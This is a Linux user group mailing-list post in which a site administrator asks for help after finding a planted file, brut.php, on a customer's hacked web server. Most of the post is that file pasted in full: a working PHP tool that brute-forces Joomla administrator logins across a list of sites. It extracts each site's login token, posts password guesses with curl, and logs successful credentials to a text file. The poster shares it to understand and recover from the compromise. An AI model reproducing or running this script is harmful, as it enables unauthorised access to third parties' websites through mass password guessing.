I have a customer with a hacked website.
When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):
How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?
--- brut.php (don't run this) ---
# GaStRo
-Dz #
Joomla Speed Brute
Force
Username:
Ex: Admin ;
administrator
in , administrator , ..
sites list:
Pass list
http://Www.sec4ever.com
">
Www.sec4ever.com |
http://Www.gastro-dz.net";>Www.gastro-dz.net
GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi - Al l
Dz Hackerz Team
";
$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); //
Get Sites !
$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); //
Get w0rdLiSt !
$Attack = new Joomla_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function'z
function txt_cln($value){ return str_replace(array("\n","\r"),"",$value);
}
class Joomla_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi('com_config',$this->post($site,$user,$pass))){
echo "# login successful : $user:$pass -> $site";
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site"; flush();}
}
public function post($site,$user,$pass){ // Post -> user & pass
$token = $this->extract_token($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for ->
function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for -> function
extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
}
?>
--
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html